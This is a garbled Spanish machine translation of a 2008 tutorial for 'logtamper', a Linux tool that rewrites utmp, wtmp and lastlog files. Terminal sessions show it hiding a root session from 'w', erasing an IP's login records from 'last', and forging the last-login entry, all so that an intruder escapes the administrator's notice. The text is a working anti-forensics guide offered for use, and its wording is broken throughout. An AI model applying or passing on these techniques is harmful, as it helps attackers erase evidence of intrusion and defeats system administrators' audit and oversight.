logtamper versión1.1 logtamper es una herramienta de registro de linux * modificada *. Al modificar el archivo de registro, puede retener la información de tiempo del archivo modificado (atime no ha cambiado, no es necesario). [root @ localhost logtamper] # ./logtamper-static Logtamper v 1.1 para linux logtamper [-f utmp_filename] -h nombre de usuario nombre de host ocultar nombre de usuario conectado desde hostname logtamper [-f wtmp_filename] -w nombre de usuario hostname borrar nombre de host en wtmp file logtamper [-f lastlog_filename] -m nombre_usuario host nombre ttyname YYYY [: MM [: DD [: hh [: mm [: ss]]]]] modificar la información lastlog info -f: se usa para especificar la ruta del archivo a modificar, es una Opcional Dado que las rutas de almacenamiento de registro de diferentes sistemas son diferentes, puede especificarlas manualmente. La ubicación de registro predeterminada es: # defina UTMPFILE " /var /run /utmp &#; #define WTMPFILE " /var /log /wtmp " #define LASTLOGFILE " /var /log /lastlog " -h Opciones: a veces Al mismo tiempo que el administrador, el administrador puede verlo. Use la opción -h para evadir al administrador w para ver de la siguiente manera: [root @ localhost logtamper] # w 21:27:25 hasta 5 días, 13:48, 4 usuarios, carga promedio: 0.00, 0.00, 0.00 USER TTY FROM LOGIN @ IDLE JCPU PCPU QUÉ raíz tty1 - Vie14 18: 24m 0.33s 0.33s -pash raíz pts /3 192.168.80.1 21:21 6:22 0.04s 0.04s -bash raíz pts /2 192.168.80.1 21:06 0.00s 0.13s 0.00sw root pts /4 192.168.80.1 21:21 5:52 0.03s 0.03s -bash Estamos conectados desde la máquina 192.168.80.1, ahora oculta: [root @ localhost logtamper] # ./logtamper-static -h Root 192.168.80.1 Logtamper v 1.1 para linux Copyright (C) 2008 por xi4oyu <
[email protected] > Parece que eres invisible ahora ... ¡Echa un vistazo! [Root @ localhost logtamper] # w 21: 27:46 hasta 5 días, 13:48, 1 usuario, carga promedio: 0.00, 0.00, 0.00 USUARIO TTY DESDE INICIO DE SESIÓN EN IDLE JCPU PCPU QUÉ raíz tty1 - Fri14 18: 24m 0.33s 0.33s -bash [root @ localhost logtamper] # -w opción: se utiliza para borrar su registro de inicio de sesión. La herramienta de eliminación de registro de Linux ahora es muy aproximada. Se puede usar para borrar ciertos hosts del nombre de host. [root @ localhost logtamper] # última raíz tty1 Mié 1 de octubre 21:30 - 21:30 (00:00) raíz pts /4 192.168.80.1 Mié 1 de octubre 21:21 todavía registrado en la raíz pts /3 192.168.80.1 Wed Oct 1 21:21 aún se ha iniciado sesión wtmp comi Wed Oct 1 06:01:46 2008 Borre el registro de inicio de sesión para 192.168.80.1: [root @ localhost logtamper] # ./logtamper-static -w root 192.168.80.1 Logtamper v 1.1 para Linux Copyright (C) 2008 por xi4oyu <
[email protected] > Aho, ahora eres invisible para durar ... ¡Echa un vistazo! [Root @ localhost logtamper] # last root tty1 Wed Oct 1 21:30 - 21 : 30 (00:00) wtmp comienza Mié 1 de octubre 06:01:46 2008 [root @ localhost logtamper] # -m opción: utilizada para modificar la última ubicación de inicio de sesión, podemos notar esto al iniciar sesión con ssh As: root Nombre de usuario enviado " root "
[email protected] 's Contraseña: Último inicio de sesión: Mié 1 de octubre 21:31:40 2008 desde 192.168.80.45 [root @ localhost ~] # Si no se repara lastlog, los administradores se les pedirá que ingrese en la próxima vez que se conecte a nuestras máquinas IP. Puede editar esta opción con la opción -m: [root @ localhost logtamper] # ./logtamper-static -m root 1.2.3.4 tty10 2008: 1: 1: 1: 1: 1 Logtamper v 1.1 para Linux Copyright (C) 2008 de Xihoyu <
[email protected] > Aho, ahora nunca has venido aquí antes ... ¡échale un vistazo! [Root @ localhost logtamper] #